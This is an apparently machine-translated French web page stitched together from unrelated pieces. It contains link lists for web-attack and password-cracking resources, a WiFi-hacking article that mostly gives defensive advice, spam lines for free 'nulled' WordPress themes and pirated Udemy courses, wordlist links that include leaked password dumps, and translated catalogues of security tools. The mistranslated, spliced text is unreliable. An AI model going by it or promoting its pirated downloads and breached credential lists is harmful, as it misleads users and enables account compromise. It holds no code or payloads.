  * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

  * http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter

  * http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/

  * http://www.digininja.org/blog/when_all_you_can_do_is_read.php

 == XSS: ==

 * http://www.infosecwriters.com/hhworld/hh8/csstut.htm

  * http://www.technicalinfo.net/papers/CSS.html

  * http://msmvps.com/blogs/alunj/archive/2010/07/07/1773441.aspx

  * http://forum.intern0t.net/web-hacking-war-games/112-cross-site-scripting-attack-defense-guide.html

  * https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf

  * http://sirdarckcat.blogspot.com/2009/08/our-favorite-xss-filters-and-how-to.html

  * http://www.securityaegis.com/filter-evasion-houdini-on-the-wire/

  * http://heideri.ch/jso/#javascript

  * http://www.reddit.com/r/xss/

  * http://sla.ckers.org/forum/list.php?2

 == Coldfusion: ==

 * http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

  * http://zastita.com/02114/Attacking_ColdFusion..html

  * http://www.nosec.org/2010/0809/629.html

  * http://h30507.www3.hp.com/t5/Following-the-White-Rabbit-A/Adobe-ColdFusion-s-Directory-Traversal-Disaster/ba-p/81964

  * http://cfunited.com/2009/files/presentations/254_ShlomyGantz_August2009_HackProofingColdFusion.pdf

 == Sharepoint: ==

 * http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,6131.msg32678/#msg32678

 == Lotus: ==

 * http://blog.ombrepixel.com/post/2009/05/06/Lotus-Notes/Domino-Security

  * http://seclists.org/pen-test/2002/Nov/43

  * http://www.sectechno.com/2010/07/12/hacking-lotus-domino/?

 == JBoss: ==

 * http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf

  * http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html

 == VMWare Web: ==

 * http://www.metasploit.com/modules/auxiliary/scanner/http/vmware_server_dir_trav

 == Serveurs d'applications Oracle: ==

 * http://www.hideaway.net/2007/07/hacking-oracle-application-servers.html

  * http://www.owasp.org/index.php/Testing_for_Oracle

  * http://www.ngssoftware.com/services/software-products/internet-security/orascan.aspx

  * http://www.ngssoftware.com/services/software-products/Database-Security/NGSSQuirreLOracle.aspx

  * http://www.ngssoftware.com/papers/hpoas.pdf

 == SAP: ==

 * http://www.onapsis.com/research.html#bizploit

  * http://marc.info/?l=john-users&m=121444075820309&w=2

  * http://www.phenoelit-us.org/whatSAP/index.html


Sans fil:

 * http://code.google.com/p/pyrit/


Capturez le drapeau / Wargames:

 * http://intruded.net/

  * http://smashthestack.org/

  * http://flack.hkpco.kr/

  * http://ctf.hcesperer.org/

  * http://ictf.cs.ucsb.edu/

  * http://capture.thefl.ag/calendar/


Conférences:

 * https://www.google.com/calendar/[email protected]&gsessionid=OK


Divers / non triés:

 * http://www.ikkisoft.com/stuff/SMH_XSS.txt


Comment pirater un mot de passe wifi

Les réseaux WiFi sont partout et sont utilisés par des millions de personnes chaque jour. Ils sont la méthode préférée de mise en œuvre des réseaux domestiques en raison de leur flexibilité et de leur commodité. Vous pouvez généralement trouver un accès Wi-Fi public dans un café ou un établissement de vente au détail n'importe où. Parfois, vous n'avez même pas besoin d'utiliser un mot de passe pour accéder à ces réseaux. C'est génial si vous voulez simplement faire une recherche rapide sur le Web ou vérifier la météo, mais vous ne voudriez pas l'utiliser pendant le transfert d'informations sensibles.

L'un des principes les plus fondamentaux de l'utilisation d'un ordinateur est que les mots de passe sont des éléments essentiels de la sécurité. Ce WiFi public sans mot de passe est une invitation ouverte aux pirates. C'est comme une grande enseigne au néon les dirigeant vers un groupe de victimes sans méfiance disponibles pour un éventuel vol d'informations d'identification et de données. Une bonne règle à suivre dans toutes vos activités en ligne est de ne jamais accéder à des données sensibles sur un réseau sans fil qui n'est pas protégé par mot de passe.

Est-il possible de pirater un mot de passe WiFi?

Malheureusement, la réponse à cette question est oui. Même si vous étiez déjà conscient de l'importance de protéger par mot de passe votre réseau WiFi, la sécurité de votre communication pourrait toujours être menacée. Le type de sécurité que vous avez mis en place sur votre réseau sans fil et la force de votre mot de passe sont les principaux facteurs qui peuvent le rendre vulnérable aux attaques. Certains des mêmes outils utilisés pour protéger etanalyser votre réseau, tel que KisMAC, peut être utilisé pour tenter d'obtenir un accès non autorisé.

KisMAC

Une incursion réussie dans votre réseau peut entraîner la perte ou le vol de données importantes et sensibles. Chaque appareil connecté au réseau peut être potentiellement infecté par des logiciels malveillants suite à une violation de la sécurité du réseau. Rassurez-vous, il y a des individus infâmes qui passent leur journée à découvrir comment pirater les mots de passe wifi et pénétrer dans des réseaux sans fil innocents pour des raisons résolument malveillantes. Vous devez vous assurer qu'ils échouent dans leurs tentatives de renverser votre sécurité.

Pourquoi quelqu'un piraterait-il un mot de passe WiFi?

Voici quelques raisons pour lesquelles une personne pourrait vouloir pirater un mot de passe WiFi. Bien que la plupart d'entre eux soient d'une intégrité douteuse, dans certains cas, le piratage d'un réseau sans fil peut avoir un objectif valable.

Les raisons valables peuvent inclure:

  • Obtenir un accès non autorisé pour effectuer des tests de pénétration.
  • Tenter d'accéder à un réseau dans une situation d'urgence.
  • Mener des enquêtes sur les organisations clandestines et dangereuses.

Les raisons les plus courantes et sans scrupules sont les suivantes:

  • Voler des informations d'identification pour permettre un accès non autorisé supplémentaire.
  • Prise de contrôle d'ordinateurs ou d'appareils sur le réseau.
  • Détruire ou voler des informations sensibles telles que des dossiers bancaires.
  • Installer des logiciels malveillants qui peuvent causer des dommages maintenant ou à une date ultérieure.
  • Voler votre signal WiFi pour se fournir un service gratuit.

Comme vous pouvez l'imaginer, la plupart des gens qui veulent savoir comment pirater les mots de passe WiFi ne le font pas pour des raisons inactives. C'est là que la valeur de la sécurité du réseau entre en jeu.

Quelle est la sécurité de ma sécurité?

La capacité de protéger adéquatement votre réseau sans fil est directement liée au type de sécurité que vous implémentez. Voici les optionsvous devriez avoir à votre disposition. Cette sécurité est appliquée via votre routeur sans fil.

WEP - Confidentialité équivalente filaire

Ce protocole de sécurité d'origine a été utilisé lors de la sortie du WiFi en 1997. Il est difficile à configurer et facile à résoudre en utilisant Renifleurs WiFi. C'est mieux que rien mais n'est pas recommandé si vous désirez une réelle sécurité.

WPA - Accès protégé par WiFi

La prochaine amélioration de la sécurité WiFi utilise un algorithme plus puissant que le WEP qui offre des capacités de cryptage améliorées, ce qui le rend plus difficile à craquer que la sécurité WEP.

WPA2 - WiFi Protected Access II

L'intégrité et le chiffrement des données sont basés sur la norme de chiffrement avancé (AES) de ce protocole. Il offre une amélioration significative par rapport à la sécurité offerte par WEP ou WPA.

WPA3 - Accès protégé Wi-Fi III

À partir de la fin de 2018, WPA3 est en cours de déploiement, offrant des niveaux de sécurité encore plus élevés pour votre réseau sans fil. Un chiffrement plus complexe est possible et les mots de passe sont traités de manière plus efficace. Les connexions au réseau public pourront bénéficier du cryptage WPA3.

Nous vous recommandons fortement d'utiliser un équipement qui prend en charge WPA2 au minimum car il offre une protection considérablement plus élevée contre les attaques de pirates qui tentent de casser votre mot de passe. Les routeurs qui ne prennent pas en charge WPA2 doivent être évités.

Une autre facette de la sécurité est la force de votre mot de passe. N'utilisez pas de mots de passe triviaux ou faciles à deviner pour votre réseau sans fil. Les mots de passe de 12 caractères ou plus sont presque impossibles à déchiffrer dans n'importe quel laps de temps légitime par n'importe quelle technologie actuelle.

Comment pirater les mots de passe WiFi

Il y a plusieurs méthodes utilisées pour pirater les mots de passe WiFi. Beaucoup utilisent un certain type de logiciel pour accéder au réseau et mener l'attaque. L'équipement peut également être utilisé pour inciter un utilisateur à révéler des informations et des informations d'identification.

Les types courants d'attaques visant à pirater des mots de passe WiFi sont:

Reniflage de paquets- Dans cette méthode, un pirate surveille un réseau dans le but d'accéder à des données non chiffrées. Si vous ne cryptez pas votre communication avec un VPN ou d'autres moyens, vous pouvez être soumis à ce type d'attaque.

Cryptage de mot de passe - Diverses techniques sont utilisées pour cracker les mots de passe. Deux des plus populaires sont:

Attaques par force brute - Une application de craquage est utilisée pour générer des séquences aléatoires de caractères dans le but de deviner le mot de passe. Cela peut prendre beaucoup de temps et de puissance de traitement. La longueur du mot de passe rend plus difficile le succès d'une attaque par force brute.

Attaques par liste de mots - Une attaque par liste de mots tente également de fournir le mot de passe correct pour accéder au réseau. Plutôt que de générer des séquences de caractères aléatoires, cette attaque utilise un fichier de dictionnaire qui contient des mots de passe potentiels. Un fichier de dictionnaire plus gros offre une plus grande chance de succès, mais peut être contrecarré avec des mots de passe longs et forts.

Faux points d'accès - Dans ce type d'attaque, les pirates informatiques mettent en place de faux points d'accès pour inciter un utilisateur à se connecter à son réseau. L'utilisateur estime qu'il se trouve sur un réseau valide et peut révéler des données confidentielles au pirate.

Injection de paquets - En utilisant cette méthode très courante, les pirates usurpent les informations d'identification d'un ordinateur et peuvent surveiller et rediriger son trafic réseau. Ils peuvent rechercher des données et des messages non cryptés à l'insu de l'utilisateur.

Comment pouvez-vous empêcher le piratage de votre mot de passe WiFi?

Les pirates informatiques comptent sur la recherche de réseaux sans fil qui ne présentent pas d'obstacles majeurs à une entrée non autorisée. Vous voulez rendre leurs efforts aussi difficiles que possible afin qu'ils trouvent un autre réseau à attaquer. Voici ce que vous pouvez faire pour rendre difficile ou impossible pour un pirate de faire des ravages sur votre réseau.

  • Modifier les informations d'identification par défaut de votre équipement - Les mots de passe par défaut pour l'équipement réseau sont faciles à trouver sur le Web. Vous devez immédiatement modifier les paramètres par défaut lors de l'installation de nouveaux équipements sur votre réseau. Le fait de ne pas les modifier laisse une énorme lacune dans la sécurité de votre réseau.
  • Gardez le matériel et le firmware du routeur à jour - Installez toujours le firmware le plus récent disponible pour votre équipement réseau.
  • Utiliser un cryptage puissant - Utilisez toujours un équipement réseau prenant en charge le protocole de sécurité WPA2. C'est la meilleure protection jusqu'à ce que WPA3 soit plus largement adopté.
  • Utilisez un mot de passe fort - Comme mentionné précédemment, votre mot de passe réseau doit comporter au moins 12 caractères alphanumériques pour minimiser les chances de succès d'une attaque par force brute contre lui.
  • Recherche de points d'accès non autorisés - à l'aide d'un analyseur de réseau tel queNetSpot ou un autre outil d'arpentage WiFi vous permet de trouver des points d'accès potentiels à l'extérieur de votre bâtiment qui peuvent avoir besoin d'être surveillés.

L'utilisation de ces méthodes peut vous aider à vous protéger contre les pirates informatiques déterminés à accéder à votre réseau WiFi. Ils sont là-bas, et c'est à vous de les tenir à distance. Ne laissez pas les portes de votre réseau sans fil grandes ouvertes.

Téléchargement gratuit des thèmes WordPress

Téléchargez les thèmes WordPress gratuitement

Téléchargez les thèmes WordPress nuls

Télécharger les meilleurs thèmes WordPress Téléchargement gratuit

udemy payé cours téléchargement gratuit

télécharger le firmware mobile

Télécharger les meilleurs thèmes WordPress Téléchargement gratuit

téléchargement gratuit cours udemy

Articles Liés:


-------------------------------------------------------------

Liste de MDP :

http://www.packetstormsecurity.org/Crackers/wordlists/

http://www.theargon.com/achilles/wordlists/

http://www.openwall.com/wordlists/

http://www.outpost9.com/ files / WordLists.html

CeWL - http://www.digininja.org/projects/cewl.php

Wyd - http://www.remote-exploit.org/codes_wyd.html

Listes de mots de passe de Korelogic: http://contest.korelogic.com/wordlists.html

Ensemble de règles John de Korelogic: http://contest.korelogic.com/rules.html

http://trac.kismac-ng.org/wiki/wordlists

OpenWall:

http://ftp.sunet.se/pub/security/tools/net/Openwall/wordlists/

ftp://ftp.openwall.com/pub/wordlists/

http://www.openwall.com/mirrors/

http://passwordz.info/

ftp://ftp.ox.ac.uk/pub/wordlists/

http://gdataonline.com/downloads/GDict/

http://theargon.com/achilles/wordlists/

http://theargon.com/achilles/wordlists/theargonlists/

ftp://ftp.cerias.purdue.edu/pub/dict/

http://www.outpost9.com/files/WordLists.html

http://www.securinfos.info/wordlists_dictionnaires.php

http://www.vulnerabilityassessment.co.uk/passwords.htm

http://packetstormsecurity.org/Crackers/wordlists/

http://www.ai.uga.edu/ftplib/natural-language/moby/

http://www.insidepro.com/eng/download.shtml

http://www.word-list.com/

http://www.cotse.com/tools/wordlists1.htm

http://www.cotse.com/tools/wordlists2.htm

http://www.phreak.org/index/archive01/hacking/wordlsts/wordlsts.shtml

http://www.indianz.ch/tools/doc/wordlists.zip

http://wordlist.sourceforge.net/

http://prdownloads.sourceforge.net/wepattack/wordlist.tar.gz?download

http://hacor.org/docs/hugelist.txt (lien brisé. Quelqu'un l'a-t-il hébergé ailleurs?)

chut! - /projects/hugelist.txt

Par operat0r

http://rapidshare.com/files/165513464/word.lst.sujohn.su200.part01.rar

http://rapidshare.com/files/165518143/word.lst.sujohn.su200.part02.rar

http://rapidshare.com/files/165498510/word.lst.sujohn.su200.part03.rar

http://wiki.services.openoffice.org/wiki/Dictionaries

http://article7.org/wordlists/

Mise à jour le 30/03/2010 04:22 par Rob Fuller

Ajouts récents:

http://www.skullsecurity.org/wiki/index.php/Passwords

hotmail: http://current.com/technology/91108676_email-password-leak-update-gmail-yahoo-aol-and-hotmail-hit-too.htm

rockyou: http://securitystream.info/data-breaches/easy-passwords-found-in-rockyou-data-leak/

http://wordlist.sourceforge.net/ (listes de mots de Kevin)

http://www.phenoelit-us.org/dpl/dpl.html

http://www.offensive-security.com/wpa-tables/wpalist.txt.tar.bz2

http://www.renderlab.net/projects/WPA-tables/


Super piratage 

Une collection de listes impressionnantes pour les pirates, les pentesters et les chercheurs en sécurité.

Vos contributions sont toujours les bienvenues!

Référentiels impressionnants

Dépôt

La description

Sécurité Android

Collection de ressources liées à la sécurité Android

AppSec

Ressources pour en savoir plus sur la sécurité des applications

Découverte d'actifs

Liste des ressources qui aident pendant la phase de découverte des actifs d'une mission d'évaluation de la sécurité

Bug Bounty

Liste des programmes de Bug Bounty et des articles des chasseurs de Bug Bounty

CTF

Liste des cadres, bibliothèques, ressources et logiciels du FCT

Cyber ​​Skills

Liste organisée d'environnements de piratage où vous pouvez former vos compétences informatiques en toute légalité et en toute sécurité

DevSecOps

Liste des outils DevSecOps impressionnants avec l'aide d'expériences et de contributions de la communauté

Sécurité embarquée et IoT

Une liste organisée de ressources impressionnantes sur la sécurité intégrée et IoT

Exploiter le développement

Ressources pour en savoir plus sur le développement d'exploit

Fuzzing

Liste des ressources fuzzing pour l'apprentissage Fuzzing et les phases initiales du développement d'exploit comme l'analyse des causes profondes

Le piratage

Liste de super tutoriels, outils et ressources de piratage

Ressources de piratage

Collection de ressources de test de piratage / pénétration pour vous rendre meilleur!

Honeypots

Liste des ressources du pot de miel

Réponse aux incidents

Liste d'outils pour la réponse aux incidents

Sécurité du système de contrôle industriel

Liste des ressources liées à la sécurité du système de contrôle industriel (SCI)

InfoSec

Liste de cours et de ressources de formation impressionnants

IoT Hacks

Collection de Hacks dans l'IoT Space

Piratage mainframe

Liste des ressources géniales de piratage / pentesting de mainframe

Analyse des logiciels malveillants

Liste d'outils et de ressources d'analyse de logiciels malveillants impressionnants

OSINT

Liste d'outils et de ressources Open Source Intelligence (OSINT) incroyablement impressionnants

Sécurité OSX et iOS

Outils de sécurité liés à OSX et iOS

Pcaptools

Collection d'outils développés par des chercheurs du domaine informatique pour traiter les traces de réseaux

Pentest

Liste de ressources, d'outils et d'autres choses géniales pour les tests de pénétration

Sécurité PHP

Bibliothèques pour générer des nombres aléatoires sécurisés, crypter les données et rechercher les vulnérabilités

Teaming rouge

Liste des ressources impressionnantes de l'équipe rouge / de l'équipe rouge

Inverser

Liste de superbes ressources d'ingénierie inverse

Sec Talks

Liste de conférences de sécurité impressionnantes

SecLists

Collecte de plusieurs types de listes utilisées lors des évaluations de sécurité

Sécurité

Collection de super logiciels, bibliothèques, documents, livres, ressources et trucs sympas sur la sécurité

Sécurité sans serveur

Collection de ressources liées à la sécurité sans serveur

Ingénierie sociale

Liste de superbes ressources d'ingénierie sociale

Analyse statique

Liste d'outils d'analyse statique, de linters et de vérificateurs de qualité de code pour divers langages de programmation

Intelligence des menaces

Liste des ressources Awesome Threat Intelligence

Sécurité des véhicules

Liste de ressources pour en savoir plus sur la sécurité des véhicules et le piratage de voiture

Recherche sur la vulnérabilité

Liste de ressources sur la recherche de vulnérabilité

Piratage Web

Liste de sécurité des applications Web

Exploitation Windows - Avancé

Liste de références impressionnantes sur l'exploitation avancée de Windows

WiFi Arsenal

Pack de divers outils utiles / inutiles pour le piratage 802.11

YARA

Liste des règles, outils et personnes YARA impressionnants

Hacker Roadmap

Un guide pour les testeurs amateurs et une collection d'outils de piratage, de ressources et de références pour pratiquer le piratage éthique.

Autres référentiels utiles

Dépôt

La description

Apprentissage automatique contradictoire

Liste organisée de formidables ressources d'apprentissage automatique contradictoires

Sécurité AI

Liste organisée des ressources de sécurité de l'IA

Liste de contrôle de sécurité API

Liste de contrôle des contre-mesures de sécurité les plus importantes lors de la conception, du test et de la libération de votre API

Notes APT

Divers documents publics, livres blancs et articles sur les campagnes APT

Référence de Bug Bounty

Liste d'écriture de prime de bogue classée par nature de bogue

Cryptographie

Ressources et outils de cryptographie

Outil CTF

Liste des frameworks, bibliothèques, ressources et logiciels Capture The Flag (CTF)

CVE PoC

Liste des CVE Proof of Concepts (PoC)

Laboratoire de détection

Scripts Vagrant & Packer pour créer un environnement de laboratoire complet avec les outils de sécurité et les meilleures pratiques de journalisation

Médecine légale

Liste d'outils et de ressources d'analyse judiciaire impressionnants

Livres de programmation gratuits

Livres de programmation gratuits pour les développeurs

Gray Hacker Resources

Utile pour les FFC, les wargames, les pentestings

Hacker101

Un cours gratuit pour la sécurité Web par HackerOne

Infosec pour commencer

Une collection de ressources, de documentation, de liens, etc. pour aider les gens à se renseigner sur Infosec

Référence Infosec

Référence de sécurité de l'information qui ne craint pas

CIO

Collecte de sources d'indicateurs de compromis

Exploitation du noyau Linux

Un tas de liens liés à l'exploration et à l'exploitation du noyau Linux

Crochetage

Ressources relatives à la sécurité et à la compromission des serrures, coffres-forts et clés.

Apprentissage automatique pour la cybersécurité

Liste organisée d'outils et de ressources liés à l'utilisation de l'apprentissage automatique pour la cybersécurité

Charges utiles

Collection de charges utiles d'attaque Web

Charges utilesToutes les choses

Liste des charges utiles et du contournement pour la sécurité des applications Web et Pentest / CTF

Pentest Cheatsheets

Collection des feuilles de triche utiles pour pentesting

Pentest Wiki

Une bibliothèque de connaissances sur la sécurité en ligne gratuite pour les pentesters / chercheurs

Listes de mots probables

Listes de mots triées par probabilité créées à l'origine pour la génération et le test de mots de passe

Liste des ressources

Collection de projets GitHub utiles classés de manière lâche

Ingénierie inverse

Liste d'articles, livres et articles sur l'ingénierie inverse

RFSec-ToolKit

Collection de Hacktools de protocole de communication par radiofréquence

Fiches de sécurité

Collection de cheatsheets pour divers outils et sujets d'infosec

Liste de sécurité

Grande liste de sécurité pour le plaisir et le profit

coquille

Liste de superbes frameworks, boîtes à outils, guides et gadgets en ligne de commande pour utiliser pleinement le shell

ThreatHunter-Playbook

Manuel de jeu du chasseur de menaces pour aider au développement de techniques et d'hypothèses pour les campagnes de chasse

Sécurité Web

Liste organisée des ressources et du matériel de sécurité Web

Besoin de plus ?

Suivez Hack avec GitHub sur vos réseaux sociaux préférés pour obtenir des mises à jour quotidiennes sur les référentiels GitHub intéressants liés à la sécurité.


Table des matières

Outils CTF

  • CTFd - CTF en boîte. Facilement modifiable et possède tout ce dont vous avez besoin pour exécuter un CTF de style dangereux.
  • FBCTF - Plateforme pour accueillir les compétitions Capture the Flag.
  • LibreCTF - CTF dans une boîte. Configuration minimale requise.
  • Mellivora - Un moteur CTF écrit en PHP.
  • NightShade - Un cadre de sécurité CTF simple.
  • OneGadget - Un outil pour vous facile de trouver le seul gadget RCE dans libc.so.6.
  • Pwntools - framework CTF et bibliothèque de développement d'exploit.
  • Scorebot - Plate-forme pour les FFC par Legitbs (Defcon).
  • V0lt - Security CTF Toolkit.

Audit de code

Analyse statique

  • Brakeman - Un scanner de vulnérabilité de sécurité d'analyse statique pour les applications Ruby on Rails.
  • Dr. Taint - Un module très WIP DynamoRIO construit sur le Dr. Memory Framework pour implémenter l'analyse des souillures sur ARM.
  • ShellCheck - Un outil d'analyse statique pour les scripts shell.

Cryptographie

  • FeatherDuster - Un outil de cryptanalyse modulaire automatisé.
  • RSATool - Génère une clé privée avec une connaissance de p et q.
  • Xortool - Un outil pour analyser le chiffrement xor multi-octets.

Docker

  • DVWA - Damn Vulnerable Web Application (DVWA) est une application Web PHP / MySQL qui est sacrément vulnérable.
  • Docker Bench for Security - Le Docker Bench for Security vérifie tous les tests automatisables du CIS Docker 1.6 Benchmark.
  • Kali Linux - Cette image Kali Linux Docker fournit une installation de base minimale de la dernière version de Kali Linux Rolling Distribution.
  • Metasploit - Logiciel de test d' intrusion Metasploit Framework (docker non officiel).
  • OWASP Juice Shop - Une webapp intentionnellement non sécurisée pour les formations en sécurité écrite entièrement en Javascript qui englobe l'intégralité du Top Ten OWASP et d'autres failles de sécurité graves.
  • OWASP Mutillidae II - Application pratique du stylo-test Web OWASP Mutillidae II.
  • OWASP NodeGoat - Un environnement pour apprendre comment les 10 principaux risques de sécurité OWASP s'appliquent aux applications Web développées à l'aide de Node.js et comment les traiter efficacement.
  • OWASP Railsgoat - Une version vulnérable de Rails qui suit le Top 10 OWASP.
  • OWASP Security Shepherd - Une plate-forme de formation à la sécurité des applications Web et mobiles.
  • OWASP WebGoat - Une application Web délibérément non sécurisée.
  • OWASP ZAP - Version actuelle du proxy d'attaque zed stable owasp dans le conteneur Docker intégré.
  • Security Ninjas - Un programme de formation sur la sécurité des applications Open Source.
  • SpamScope - SpamScope (Fast Advanced Spam Analysis Tool) Elasticsearch.
  • Vulnérabilité en tant que service: Heartbleed - Vulnérabilité en tant que service: CVE 2014-0160.
  • Vulnérabilité en tant que service: Shellshock - Vulnérabilité en tant que service: CVE 2014-6271.
  • Installation de WordPress vulnérable - Installation de WordPress vulnérable.
  • WPScan - WPScan est un scanner de vulnérabilité WordPress de boîte noire.

Médecine légale

Analyse judiciaire des fichiers

  • Autopsie - Une plate-forme de criminalistique numérique et une interface graphique avec The Sleuth Kit et d'autres outils de criminalistique numérique.
  • DFF - A Forensics Framework avec ligne de commande et interfaces graphiques. DFF peut être utilisé pour étudier les disques durs et la mémoire volatile et créer des rapports sur les activités des utilisateurs et du système.
  • Docker Explorer - Un outil pour aider à analyser les acquisitions de dockers hors ligne.
  • Hadoop_framework - Un système prototype qui utilise Hadoop pour traiter les images du disque dur.
  • OSXCollector - Une boîte à outils de collecte et d'analyse de preuves médico-légales pour OS X.
  • Scalpel - Un outil de sculpture de données open source.
  • Shellbags - Examinez les fichiers NT_USER.dat.
  • SlackPirate - Outil d'énumération et d'extraction Slack - extraire des informations sensibles d'un espace de travail Slack.
  • Sleuthkit - Une bibliothèque et une collection d'outils de criminalistique numérique en ligne de commande.
  • Telegram-extractor - Scripts Python3 pour analyser les données stockées dans Telegram.
  • Truehunter - Le but de Truehunter est de détecter les conteneurs chiffrés en utilisant une approche rapide et efficace en mémoire sans aucune dépendance externe pour faciliter la portabilité.

Réponse aux incidents

  • Hunter - Un environnement de chasse aux menaces / d'analyse de données basé sur Python, Pandas, PySpark et Jupyter Notebook.

Analyse en direct

  • OS X Auditor - OS X Auditor est un outil gratuit de criminalistique informatique Mac OS X.
  • Windows-event-forwarding - Un référentiel pour utiliser le transfert d'événements Windows pour la détection et la réponse aux incidents.

Forensics de la mémoire

  • Rekall - Framework d'analyse de mémoire développé par Google.
  • Volatilité - Extraire des artefacts numériques à partir d'échantillons de mémoire volatile (RAM).

Divers

  • Diffy - Un outil numérique de criminalistique et de réponse aux incidents (DFIR) développé par la Security Intelligence and Response Team (SIRT) de Netflix. Permet à un enquêteur médico-légal d'étendre rapidement un compromis sur les instances cloud pendant un incident et de trier ces instances pour les actions de suivi.
  • HxD - Un éditeur hexadécimal qui, en plus de l'édition du disque brut et de la modification de la mémoire principale (RAM), gère les fichiers de toute taille.
  • Libfvde - Bibliothèque et outils pour accéder aux volumes chiffrés FileVault Drive Encryption (FVDE).

Mobile

  • Android Forensic Toolkit - Vous permet d'extraire des enregistrements SMS, l'historique des appels, des photos, l'historique de navigation et le mot de passe d'un téléphone Android.
  • Extracteur de sauvegarde Android - Utilitaire pour extraire et reconditionner les sauvegardes Android créées avec la sauvegarde adb (ICS +). Largement basé sur BackupManagerService.java d'AOSP.
  • Mem - Outil utilisé pour vider la mémoire des appareils Android.
  • Snoopdroid - Extraire des packages à partir d'un appareil Android.
  • WhatsApp Media Decrypt - Déchiffrez les fichiers multimédias chiffrés WhatsApp.

Forensics réseau

  • Dnslog - Outil de journalisation DNS minimaliste.
  • Dshell - Un cadre d'analyse médico-légale de réseau.
  • Passivedns - Un renifleur de réseau qui enregistre toutes les réponses du serveur DNS pour une utilisation dans une configuration DNS passive.
  • Website Evidence Collector - L'outil Website Evidence Collector (WEC) automatise la collecte de preuves de site Web de stockage et de transfert de données personnelles.

Piratage de matériel

Ordinateur

  • Kbd-audio - Outils pour capturer et analyser les entrées au clavier associées à la capture du microphone.
  • LimeSDR-Mini - La carte LimeSDR-Mini fournit une plate-forme matérielle pour développer et prototyper des conceptions numériques et RF hautes performances et à forte intensité logique à l'aide du MAX10 FPGA et de l'émetteur-récepteur Lime Microsystems d'Altera.
  • NSA-B-GONE - Carte Thinkpad X220 qui déconnecte les lignes de données de la webcam et du microphone.

Intelligence

  • Attackintel - Un script python pour interroger l'API MITRE ATT & CK pour les tactiques, techniques, atténuations et méthodes de détection pour des groupes de menaces spécifiques.
  • IntelOwl - Analysez des fichiers, des domaines et des adresses IP de plusieurs manières à partir d'une seule API à grande échelle.
  • Shodan-seeker - Outil en ligne de commande utilisant l'API Shodan. Génère et télécharge les résultats CSV, différant des résultats d'analyse historiques, des alertes et la surveillance de ports / IP spécifiques, etc.
  • VIA4CVE - Un agrégateur de la base de données des vulnérabilités des fournisseurs connus pour prendre en charge l'expansion des informations avec les CVE.
  • Yeti - Votre renseignement sur les menaces quotidiennes.

Bibliothèque

C

  • Libdnet - Fournit une interface portable simplifiée à plusieurs routines de mise en réseau de bas niveau, y compris la manipulation d'adresse réseau, la recherche et la manipulation du cache d'arp du noyau et de la table de routage, le pare-feu réseau, la recherche et la manipulation d'interface réseau, le tunneling IP et le paquet IP brut et la trame Ethernet transmission.

Java

  • Libsignal-service-java - Une bibliothèque Java / Android pour communiquer avec le service de messagerie Signal.

Python

  • Amodem - Bibliothèque de communication Audio MODEM en Python.
  • Dpkt - Création / analyse de paquets simple et rapide, avec des définitions pour les protocoles TCP / IP de base.
  • Pcapy - Un module d'extension Python qui s'interface avec la bibliothèque de capture de paquets libpcap. Pcapy permet aux scripts python de capturer des paquets sur le réseau. Pcapy est très efficace lorsqu'il est utilisé en conjonction avec un paquet de gestion de paquets tel qu'Impacket, qui est une collection de classes Python pour la construction et la dissection de paquets réseau.
  • Plyara - Analysez les règles de YARA et opérez -les plus facilement.
  • PyBFD - Interface Python vers la bibliothèque GNU Binary File Descriptor (BFD).
  • PyPDF2 - Un utilitaire pour lire et écrire des PDF avec Python.
  • Pynids - Un wrapper python pour libnids, une bibliothèque de système de détection d'intrusion réseau offrant le reniflement, la défragmentation IP, le réassemblage de flux TCP et la détection de scan de port TCP. Laissez vos propres routines python examiner les conversations réseau.
  • Pypcap - Ceci est un wrapper Python orienté objet simplifié pour libpcap.
  • Python-ptrace - Liaison Python de la bibliothèque ptrace.
  • RDPY - RDPY est une implémentation Python pure du protocole Microsoft RDP (Remote Desktop Protocol) (côté client et serveur).
  • Scapy - Un programme et une bibliothèque interactifs de manipulation de paquets basés sur python.

Rubis

  • Secureheaders - En-têtes liés à la sécurité tout en un joyau.

Live CD - Distributions

  • Android Tamer - Plateforme virtuelle / en direct pour les professionnels de la sécurité Android.
  • ArchStrike - Un référentiel Arch Linux pour les professionnels de la sécurité et les amateurs.
  • BOSSLive - Une distribution indienne GNU / Linux développée par CDAC et personnalisée pour s'adapter à l'environnement numérique indien. Il prend en charge la plupart des langues indiennes.
  • BackBox - Distribution basée sur Ubuntu pour les tests de pénétration et les évaluations de sécurité.
  • BlackArch - Distribution basée sur Linux Arch pour les testeurs de pénétration et les chercheurs en sécurité.
  • DEFT Linux - Suite dédiée à la réponse aux incidents et à la criminalistique numérique.
  • Fedora Security Lab - Un environnement de test sûr pour travailler sur l'audit de sécurité, la criminalistique, le sauvetage de système et l'enseignement des méthodologies de test de sécurité dans les universités et autres organisations.
  • Kali - Une distribution Linux conçue pour la criminalistique numérique et les tests de pénétration.
  • NST - Distribution de Network Security Toolkit.
  • Ophcrack - Un cracker de mot de passe Windows gratuit basé sur des tables arc-en-ciel. Il s'agit d'une implémentation très efficace de tables arc-en-ciel réalisée par les inventeurs de la méthode. Il est livré avec une interface utilisateur graphique et fonctionne sur plusieurs plates-formes.
  • Parrot - Distribution de sécurité GNU / Linux conçue avec le pentesting cloud et la sécurité IoT à l'esprit.
  • Pentoo - Livecd axé sur la sécurité basé sur Gentoo.
  • REMnux - Boîte à outils pour aider les analystes de logiciels malveillants avec la rétro-ingénierie des logiciels malveillants

Malware

Analyse dynamique

  • Androguard - Reverse engineering, Malware et goodware analyse des applications Android.
  • Cuckoo Sandbox - Un système automatisé d'analyse dynamique des malwares.
  • CuckooDroid - Analyse automatisée des logiciels malveillants Android avec Cuckoo Sandbox.
  • DECAF - Abréviation de Dynamic Executable Code Analysis Framework, est une plate-forme d'analyse binaire basée sur QEMU.
